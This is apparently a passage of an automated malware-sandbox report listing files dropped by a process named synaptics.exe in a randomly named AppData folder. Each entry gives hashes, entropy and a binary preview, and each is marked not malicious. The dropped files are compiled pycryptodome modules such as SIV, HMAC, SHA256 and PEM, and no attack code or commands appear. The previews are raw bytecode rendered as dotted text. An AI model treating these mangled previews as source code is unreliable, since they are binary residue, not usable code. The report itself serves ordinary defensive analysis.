                                                                                                                                                                                                            Preview:o..........g!8.......................@...s....d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc....................@...sl...e.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1539
                                                                                                                                                                                                            Entropy (8bit):4.658358185078957
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:1KD8osetp6ePCXjDRy2NjKKJwABNfKxmZk5F5186hnnj5Mwj:1KwosM6p1hKV860wj
                                                                                                                                                                                                            MD5:B061A277EB9CE1A6CA7013B7E267FFCC
                                                                                                                                                                                                            SHA1:D32D1DCA060D26E668E9B0CD5688F036ABD6D22C
                                                                                                                                                                                                            SHA-256:7B93AAD4EDE20DD45AD9BE41FB3CEE34C9FE0E905E3564EF63C887890BE9A662
                                                                                                                                                                                                            SHA-512:402E7A89282998C3B92E994839DF51FC12D6BDFEBB9173CB732C228F1F397D45147F957E205219EC7A26D9E921F716460EC3A355344B0B489CD1E5DA070F8210
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gI........................@...s2...d.d.l.m.Z.m.Z.m.Z...e.d.d...Z.d.d...Z.d.d...Z.d.S.)......)...load_pycryptodome_raw_lib..c_size_t..c_uint8_ptrz.Crypto.Cipher._pkcs1_decodea..... int pkcs1_decode(const uint8_t *em, size_t len_em,. const uint8_t *sentinel, size_t len_sentinel,. size_t expected_pt_len,. uint8_t *output);.. int oaep_decode(const uint8_t *em,. size_t em_len,. const uint8_t *lHash,. size_t hLen,. const uint8_t *db,. size_t db_len);. c....................C...sP...t.|...t.|...k.r.t.d.....t...t.|...t.t.|.....t.|...t.t.|.....t.|...t.|.....}.|.S.).Nz.Incorrect output length)...len..ValueErr
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7307
                                                                                                                                                                                                            Entropy (8bit):5.260707163872319
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ivykv8y2Ed5cPnd8Pr+jnH02x8yC0enZH3i2Ms+dlFKyXcfT7b2k1hITnSHWalQ7:ryC8D+n8yC0rsePJXOz29S7QGLm
                                                                                                                                                                                                            MD5:287130927ACD5440D2BAD553E0BFEF81
                                                                                                                                                                                                            SHA1:6611E5FC33112BD7EC04773AA42495445A00EA26
                                                                                                                                                                                                            SHA-256:6B5538C22A294A82F48AEE391F04290012178FF410A290E516B038B154FB8C8D
                                                                                                                                                                                                            SHA-512:B5F5093E89FC5AC66BAF960DB3A06D00E3BDF9E3F5C4FE966A2C8AA7058AFA3641EC0E25D306E8DF44037B64DF929C3BD7CA2A1999147363B919D632578B439F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.%.......................@...sr...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d...Z.d.S.)......)...unhexlify)...bord..tobytes)...get_random_bytes)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._BLAKE2sa..... int blake2s_init(void **state,. const uint8_t *key,. size_t key_size,. size_t digest_size);. int blake2s_destroy(void *state);. int blake2s_update(void *state,. const uint8_t *buf,. size_t len);. int blake2s_digest(const void *state,. uint8_t digest[32]);. int blake2s_copy(co
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7937
                                                                                                                                                                                                            Entropy (8bit):5.383643606225201
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:gkzUGdR3AHmrFQCkRU3hoM2wis+jpxKmWBKskH3Pj:xzUGPQHmrFQJRUCM2wiZdxzPzXPj
                                                                                                                                                                                                            MD5:A6A1CA9470C7E19983E75C506AB1CB43
                                                                                                                                                                                                            SHA1:30B83E645478F6059D7BC896EEBA87FA701B9ECB
                                                                                                                                                                                                            SHA-256:CE79FDF6F1F2F07CB9FEB70B00DC33B6BE4AEB0FB4FAD8FC68B9CB82757CB66F
                                                                                                                                                                                                            SHA-512:4A653A10120C525885468F46BA2F1AA71115813477D9B62E67412815953C108861B31F3F9BC29D0522C1A9FDDB9C26F8BE846ACFC5EFA277EBD0CBEC055CB1F7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g:*.......................@...s....d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z.d.d.d...Z.G.d.d...d.e...Z.....d.d.d...Z.d.S.)......)...unhexlify)...BLAKE2s)...strxor)...long_to_bytes..bytes_to_long)...bord..tobytes.._copy_bytes)...get_random_bytesNc....................C...s,...t.|...d.>.|.A.}.t.|.t.|.....t.|.....d.....S.).N.....).r....r......len)...bsZ.xor_lsb..num..r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Hash\CMAC.py.._shift_bytes$...s........r....c....................@...sT...e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...CMACz.A CMAC hash object.. Do not instantiate directly. Use the :func:`new` function... :ivar digest_size: the size in bytes of the resulting MAC tag. :vartype digest_size: integer. Nc....................C...sD...|.|._.t.d.d.|...|._.|.|._.|.|._.|.j...|._.}.d.|._.|.|._.|.d.k.r&d.}.d.|._.n.|.d.k.r0d.}.d.|._.n.t.d.|.......d.|...}.|.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6367
                                                                                                                                                                                                            Entropy (8bit):5.473238666729409
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:OqnCPUNnlO1qs4mQ8UGLe57h6edAGJHFMxdO3vCqA2MwqQH3SzCFKK0MFBPhXC0I:TfQzexh6JdtJtAJFPQ9
                                                                                                                                                                                                            MD5:2115BF31F8E1800EEC7378FD67D21984
                                                                                                                                                                                                            SHA1:2B1195F2D317CD40783FE259702A2FF86BAB8CCF
                                                                                                                                                                                                            SHA-256:74FB3A935FA5F2000C5E5B73CE0D7CE8E96656C84C761BC22109119610CD23B4
                                                                                                                                                                                                            SHA-512:F5CAA10D581F2745D46306E807C51DD4EB70001E83412FCD8BE001E7CA578E65D467088A91A1C06A1571AC60D0BF3FEBADE312394E0E2991754B24C52EC47AC6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g. .......................@...s....d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.g.Z.d.d.d.d.d.d.d.d.d.d.d.d...Z.d.d...e.....D...Z.G.d.d...d.e...Z.d.d.d...Z.d.S.)......)...bord..tobytes)...unhexlify)...BLAKE2s)...strxor)...get_random_bytes..new..HMACz.1.2.840.113549.2.7z.1.2.840.113549.2.8z.1.2.840.113549.2.9z.1.2.840.113549.2.10z.1.2.840.113549.2.11z.1.2.840.113549.2.12z.1.2.840.113549.2.13z.2.16.840.1.101.3.4.2.13z.2.16.840.1.101.3.4.2.14z.2.16.840.1.101.3.4.2.15z.2.16.840.1.101.3.4.2.16).z.1.3.14.3.2.26z.2.16.840.1.101.3.4.2.4z.2.16.840.1.101.3.4.2.1z.2.16.840.1.101.3.4.2.2z.2.16.840.1.101.3.4.2.3z.2.16.840.1.101.3.4.2.5z.2.16.840.1.101.3.4.2.6z.2.16.840.1.101.3.4.2.7z.2.16.840.1.101.3.4.2.8z.2.16.840.1.101.3.4.2.9z.2.16.840.1.101.3.4.2.10c....................C...s....i.|.].\.}.}.|.|...q.S...r....)....0..k..vr....r.....MC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Hash\HMAC.py..<dictcomp>:...s......r....c....................@...sR
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5421
                                                                                                                                                                                                            Entropy (8bit):5.188027745089437
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:nbykvVEVoaG0Ed5chlD1HkiM7wmZH3wmbOs6Q1/wQbya2qzgRlpXnFMNh:nhETDkFbAQVwQPsRPA
                                                                                                                                                                                                            MD5:48B49E4141205ED011B6F0C370B14D24
                                                                                                                                                                                                            SHA1:06639418D458BBF97729FAEAAFCD357BEA03E3C8
                                                                                                                                                                                                            SHA-256:B02CFE4B398DFA98038AEB184D05A01193761395881B9234FA9CCF8F8E6AFC36
                                                                                                                                                                                                            SHA-512:F2636E62B9B276EC2CD601D94E6A5865FBFA40399998F628DE983E8F340308BC5400B80ED085C7D7BED6578B2CBE382BCF8FBAD4A79CCA9692F2899D47056BE4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sd...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.d.Z.d.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._MD5a..... #define MD5_DIGEST_SIZE 16.. int MD5_init(void **shaState);. int MD5_destroy(void *shaState);. int MD5_update(void *hs,. const uint8_t *buf,. size_t len);. int MD5_digest(const void *shaState,. uint8_t digest[MD5_DIGEST_SIZE]);. int MD5_copy(const void *src, void *dst);.. int MD5_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5444
                                                                                                                                                                                                            Entropy (8bit):5.1943641502664235
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:Mtykvm51RUT7NCaGuEd5SCzor1HcMM7AF8ZH3w7MbOs6IVFya28zTlpXJ1MB5:Mc51RC7NrC0rcTbAIVjXxU
                                                                                                                                                                                                            MD5:E2F10D79EA5176C7B19C918C6644D284
                                                                                                                                                                                                            SHA1:5099B2CAD907BA0969064B398AE6485DB5672C48
                                                                                                                                                                                                            SHA-256:CAC5C3450507329464B2CBA3D03759FF9071EB1773960B6617D5D47C82B47161
                                                                                                                                                                                                            SHA-512:B8725DDB9DE0FF30B5BC7697C91179EC559B55A3F9E77D43CC26CE56BE1703FDB98B2FB3BCE412DFF43DD8B1BE9E81A58C6B4ACF1BCBDEAE2E3696A618718ED9
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sh...d.d.l.T.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)......)...*)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA1a..... #define SHA1_DIGEST_SIZE 20.. int SHA1_init(void **shaState);. int SHA1_destroy(void *shaState);. int SHA1_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA1_digest(const void *shaState,. uint8_t digest[SHA1_DIGEST_SIZE]);. int SHA1_copy(const void *src, void *dst);.. int SHA1_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5617
                                                                                                                                                                                                            Entropy (8bit):5.185158564879765
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:ukykv4XXR6TJDkKGAEd58i5c1HqO2NZH3Hb4fOs6viWkZLgz47MrxK:uhXXR8JDg5cyj4fAvTWURK
                                                                                                                                                                                                            MD5:623B08DADFB709BD4E20975A9D74C431
                                                                                                                                                                                                            SHA1:3A8A1CBDAE35D880E5CB9CFD0C205E5884E592EB
                                                                                                                                                                                                            SHA-256:1F6C4FC87449205B986A5175A190C60EC9F10758331C3406F7CC0B7A1A6F7CBF
                                                                                                                                                                                                            SHA-512:5D8DECC44EB2193167A86F9525375828FE0BC7DBEA0665B78B4205E7C82F1F7183158B0071EC0E3E4754486BF4C7E424BA98A96F1D82327A9A998176E31B1058
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...sl...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...e.d.d...Z.G.d.d...d.e...Z.d.d.d...Z.e.j.Z.e.j.Z.d.d...Z.d.S.)..........bord)...load_pycryptodome_raw_lib..VoidPointer..SmartPointer..create_string_buffer..get_raw_buffer..c_size_t..c_uint8_ptrz.Crypto.Hash._SHA256a..... int SHA256_init(void **shaState);. int SHA256_destroy(void *shaState);. int SHA256_update(void *hs,. const uint8_t *buf,. size_t len);. int SHA256_digest(const void *shaState,. uint8_t *digest,. size_t digest_size);. int SHA256_copy(const void *src, void *dst);.. int SHA256_pbkdf2_hmac_assist(const void *inner,. const void *outer,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1716
                                                                                                                                                                                                            Entropy (8bit):5.630533336211545
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:+okzpHdkloLwZGD20+wMmqlZ6tBZKBTIIIXII5p6:+lHd/20uSzgBG4
                                                                                                                                                                                                            MD5:4967092305548CE67B1AF379BDFC7D46
                                                                                                                                                                                                            SHA1:499FF0872882CC3F25A1079061756EA63CA286E3
                                                                                                                                                                                                            SHA-256:DCDCB291170D5F31562B79437660E4D94A793FB77EFA0C2922CE6DE02A83B6AF
                                                                                                                                                                                                            SHA-512:C08DA05FAF0A6B771ABC014E981E9B85BD3880EC29E91E815F9297E3D6B9487562150931B60688B443EF7223E7C9D8899F1F1985CBD58403BABEF4E986A14D6F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....g.d...Z.d.d...Z.d.S.).)...HMACZ.MD2Z.MD4..MD5Z.RIPEMD160..SHA1..SHA224..SHA256..SHA384..SHA512..SHA3_224..SHA3_256..SHA3_384..SHA3_512Z.CMACZ.Poly1305Z.cSHAKE128Z.cSHAKE256Z.KMAC128Z.KMAC256Z.TupleHash128Z.TupleHash256Z.KangarooTwelveZ.TurboSHAKE128Z.TurboSHAKE256c....................C...sT...|.....}.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r<d.d.l.m.}...|.....S.|.d.v.rJd.d.l.m.}...|.....S.|.d.v.rZd.d.l.m.}...|.j.d.d...S.|.d.v.rjd.d.l.m.}...|.j.d.d...S.|.d.v.rxd.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.|.d.v.r.d.d.l.m.}...|.....S.t.d.t.|.........).zKReturn a new hash instance, based on its name or. on its ASN.1 Object ID).z.1.3.14.3.2.26r....z.SHA-1.....).r....).z.2.16.840.1.101.3.4.2.4r....z.SHA-224).r....).z.2.16.840.1.101.3.4.2.1r....z.SHA-256).r....).z.2.16.840.1.101.3.4.2.2r....z.SHA-384).r....).z.2.16.840.1.101.3.4.2.3r....z.SHA-512).r....).z.2.16.840
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4554
                                                                                                                                                                                                            Entropy (8bit):5.782560603617485
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:IJClXflwfEc4b6mdKEHSjZtJ4uoJZ/jWR8I4wqAAS4IILLgPT:IJCffv6moHZtJ4uOjO8I4wqAATIILEL
                                                                                                                                                                                                            MD5:B911E2A6BAD8533D874993159F672541
                                                                                                                                                                                                            SHA1:3D0C8BFE400522A66BE171A06E9AE5FC3F5F8B90
                                                                                                                                                                                                            SHA-256:D3A96EE7C9688406F8EC918D768BFD3F69E3630A0659D93F2FA76C6BEF0ABC09
                                                                                                                                                                                                            SHA-512:7D2D7BA32346C9E702C2EA3F81AEAD3E18191A229CFD4C113C7C93B36E2908E85C2190DDC62BDD9DEE6746927A658DA4185AE11B3E9D32C5664E87207B43D1D1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.........................@...s....d.d.g.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.d...Z.d.d...Z.d.d.d...Z.d.S.)...encode..decode.....N)...a2b_base64..b2a_base64..hexlify..unhexlify)...MD5)...pad..unpad)...DES..DES3..AES)...PBKDF1)...get_random_bytes)...tobytes..tostrc........................s....|.d.u.r.t.}.d.|...}.|.rB|.d...}.t.|.|.d.d.t...}.|.t.|.|...|.d.d.t...7.}.t...|.t.j.|...}.|.d.t.t.|...........7.}.|...t...|.j.......n.|.d.u.rJt.d.......f.d.d...t.d.t.....d...D...}.|.d...|...7.}.|.d.|...7.}.|.S.).a4...Encode a piece of binary data into PEM format... Args:. data (byte string):. The piece of binary data to encode.. marker (string):. The marker for the PEM block (e.g. "PUBLIC KEY").. Note that there is no official master list for all allowed markers.. Still, you can refer to the OpenSSL_ source code.. passphrase (byte string):. If given,
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):198
                                                                                                                                                                                                            Entropy (8bit):5.102517034841878
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:y/zwO/lGptBlxnzgmgudWEJDkzzXqIt+kiE2J5dj/a6iVWrz4ixikcTgf:y/M7pznzgmgSW+BIwkn23h/a/ArMAy+
                                                                                                                                                                                                            MD5:9B601A7F2430B3CC10F8E627E947FBC8
                                                                                                                                                                                                            SHA1:45D37F365BB2F896C71D52BCAA848DC3BBB31E4B
                                                                                                                                                                                                            SHA-256:D3B4D88586CEBDAA3B98B7F503E31FD79C003604184FB3C6B5BE70EB84006E95
                                                                                                                                                                                                            SHA-512:B9A55B3F3651C0BEEF50C47A57A9EC8489AFC9EBFA8D2CE67C3766E1062B380B6841A071FD6AB734586A9610E792F6F3C6639380AA7B8DA6696F0E30568B81A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g#........................@...s....d.d.g.Z.d.S.)...PEM..PKCS8N)...__all__..r....r.....OC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\IO\__init__.py..<module>....s......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):642
                                                                                                                                                                                                            Entropy (8bit):5.530040912669372
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:CG1N7ZF90SSj9kEiuMbSSLvZHLspPvZHLOkvZHLZlyfsnT+5ggD:bPcjIbSSLvZoFvZ5vZKfK657
                                                                                                                                                                                                            MD5:CAE375DBF1DC68354D65B0181F6D3B60
                                                                                                                                                                                                            SHA1:284AA93980CA5F2DDBDEA7DB8EB69381267BC9A5
                                                                                                                                                                                                            SHA-256:4E8757B4C382EF8DDAD847F4E5ECC9BA6A89274FA1F013314ADAAE1594E11DCB
                                                                                                                                                                                                            SHA-512:AE8FC9FCA02BF051436251BC23BD673B26176791653D216EAE09FD8A11B2E6E2F9471D3F619C0660424C44D002EC48DE2C07FF0005E8D37B483F702E3F994467
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........gk........................@...s....d.g.Z.d.d.l.Z.z.e...d...r.e.....d.d.l.m.Z...d.d.l.m.Z...W.d.S...e.e.e.f.yN......z.d.d.l.m.Z...d.d.l.m.Z...W.Y.d.S...e.e.f.yM......d.d.l.m.Z...i.Z.Y.Y.d.S.w.w.)...Integer.....NZ.PYCRYPTODOME_DISABLE_GMP)...IntegerGMP)...implementation)...IntegerCustom)...IntegerNative)...__all__..os..getenv..ImportErrorZ.Crypto.Math._IntegerGMPr....r....r....Z._implementation..OSError..AttributeErrorZ.Crypto.Math._IntegerCustomr....Z.Crypto.Math._IntegerNativer......r....r.....PC:\Users\user\AppData\Local\xFSOj9El1Q\lib\site-packages\Crypto\Math\Numbers.py..<module>....s ...................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7453
                                                                                                                                                                                                            Entropy (8bit):5.520144073570933
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RfN8ODJylGU8lODJq3D6Gd5+zbXQO5qcUd:R4c3OGdmtW
                                                                                                                                                                                                            MD5:E9659636A79B322AAA8E303569E76284
                                                                                                                                                                                                            SHA1:AC461609CA725FEA929AAEBEA336FA45A1EBCD6F
                                                                                                                                                                                                            SHA-256:9AB495CB259A383FD4D6B1C81DA071CF9ABAEB15247217D1D508823E554CC6F7
                                                                                                                                                                                                            SHA-512:F77CD2AA6BF43C9EF4FEB53EA47F1EE36BCE623D42DC9D49F2277209F03FB6A1BE31D4331F7F15894E9D1961DAA69913D79C98405A936D01B306489CB0F72A09
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.-.......................@...s|...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.d.d...Z.d.d...Z.d.d.l.m.Z...e.e.d.d.......Z.d.d.d...Z.d.d...Z.d.d...Z.d.S.).zHFunctions to create and test prime numbers...:undocumented: __package__......)...Random)...Integer)...iter_range.....Nc....................C...s<...t.|.t...s.t.|...}.|.d.v.r.t.S.|.....r.t.S.t.d...}.t.|.d.....}.|.d.u.r(t.....j.}.t.|...}.d.}.|.....r>|.d.L.}.|.d.7.}.|.....s2t.|...D.]Y}.d.}.|.|.|.f.v.rlt.j.d.|.d...|.d...}.d.|.....k.rc|.d...k.sfJ.....J...|.|.|.f.v.sLt.|.|.|...}.|.|.|.f.v.ryqBt.d.|...D.].}.t.|.d.|...}.|.|.k.r...n.|.|.k.r.t.........S.q~t.....S.qBt.S.).a:...Perform a Miller-Rabin primality test on an integer... The test is specified in Section C.3.1 of `FIPS PUB 186-4`__... :Parameters:. candidate : integer. The number to test for primality.. iterations : integer. The maximum number of iterations to perform before. declaring a candidate a probable prime.. randfunc
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):11454
                                                                                                                                                                                                            Entropy (8bit):4.987429979141811
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Tj5Panvqjgi/xVcz2QRUtIs3J3Aqqk0ruPuRfNob3l8kKlzC2WrUkvh:TjMvqjgEVcz2QCtIs3J3AqJZb36kK5Ct
                                                                                                                                                                                                            MD5:CCD8D69628FD7937624DCC2656CB80DC
                                                                                                                                                                                                            SHA1:E33311D3838381D700419F598876D7DEDEBB1DC6
                                                                                                                                                                                                            SHA-256:E14EE32CD4BFFFB802BD055C6D00DEB023C87E848D7C39A3B5A65BE340981B2C
                                                                                                                                                                                                            SHA-512:B7C0A790EA598FC770727A4538FE15048DE001924603EFAC0382B9C7EB5EF1EDC22C5C96B70F738B075470F424491C78B6262672E17AE8E64DFB6A5A2E9217FE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o..........g.-.......................@...s@...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...G.d.d...d.e...Z.d.S.)......N)...iter_range..bord..bchr..ABC)...Randomc....................@...s....e.Z.d.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.dhd.d.....Z.e.e.j.did.d.......Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d.....Z.e.Z.e.j.d.d.....Z.e.j.d.d.....Z.e.j.d.d ....Z.e.j.d!d"....Z.e.j.d#d$....Z.e.j.d%d&....Z.e.j.djd(d)....Z.e.j.djd*d+....Z.e.j.d,d-....Z.e.j.djd.d/....Z.e.j.d0d1....Z.e.j.d2d3....Z.e.j.d4d5....Z.e.j.d6d7....Z e.j.d8d9....Z!e.j.d:d;....Z"e.j.d<d=....Z#e.j.d>d?....Z$e.j.d@dA....Z%e.j.dBdC....Z&e.j.dDdE....Z'e.j.dFdG....Z(e.j.dHdI....Z)e.j.dJdK....Z*e.j.dLdM....Z+e.j.dNdO....Z,e.j.dPdQ....Z-e.j.dRdS....Z.e.j.dTdU....Z/e.j.dVdW....Z0e.j.dXdY....Z1e.j.dZd[....Z2e.j.d\d]....Z3e.e.j.d^d_......Z4e.d`da....Z5e6dbdc....Z7e6ddde....Z8e.e.j.dfdg......Z9d'S.)k..IntegerBasec....................C........d.S...N......selfr....r.....UC:\Us
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2974
                                                                                                                                                                                                            Entropy (8bit):5.42367862428394
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:gXkxRn/584h+MihHMKCNnK3FN1UfeLdyyVNRYtCmVMclu06OJGsvpuI3NvprfgD6:gXkv/YXhH1829bgkmVMeX6cp3lprfgD6
                                                                                                                                                                                                            MD5:3AEA07E37878DCE7919321E978D49B68
                                                                                                                                                                                                            SHA1:5A204648C7556E185F9BCAF8670DB4F5D3E44463
                                                                                                                                                                                                            SHA-256:152145DE5A3707C43346926BBC4E02ACE81658F46382C3E5305B7B59D04F689F
                                                                                                                                                                                                            SHA-512:715F744DE6CC1C9A73DDD977DB3E64792B6CBBB7BD87D4CB15D1153BEF21480A995F015D98A3D69D32DCEE2A6EB2D1568E5C4B343B81C850190519EF1D76743D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
